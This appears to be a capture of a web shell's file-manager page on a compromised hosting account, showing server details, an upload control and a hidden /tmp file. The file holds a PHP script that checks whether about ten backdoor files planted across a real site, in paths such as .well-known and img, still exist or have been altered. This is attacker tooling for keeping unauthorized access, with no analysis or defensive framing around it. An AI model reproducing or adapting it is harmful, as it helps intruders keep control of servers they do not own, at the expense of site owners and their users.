HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //tmp/.mrk
<?php   $r = '/home/vitanhod/vigolic100.vitavit.com.pk'; $x = ["/orderemail.php"=>"bd@@1315041@@12",
"/uninstall.akeeba.php"=>"bd@@1310552@@951",
"/orderemail_bk.php"=>"bd@@1314914@@40",
"/includes/config.php"=>"bd@@1314992@@60",
"/img/archive1.php"=>"bd@@1310624@@1016",
"/.well-known/search_links.php"=>"bd@@1310661@@913",
"/.well-known/search_links.php"=>"bd@@1314830@@100",
"/img/archive1.php"=>"bd@@1315102@@3",
"/includes/admin.trash.php"=>"bd@@1309763@@1020",
"/.well-known/pki-validation/class.draft.php"=>"bd@@1310584@@983"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');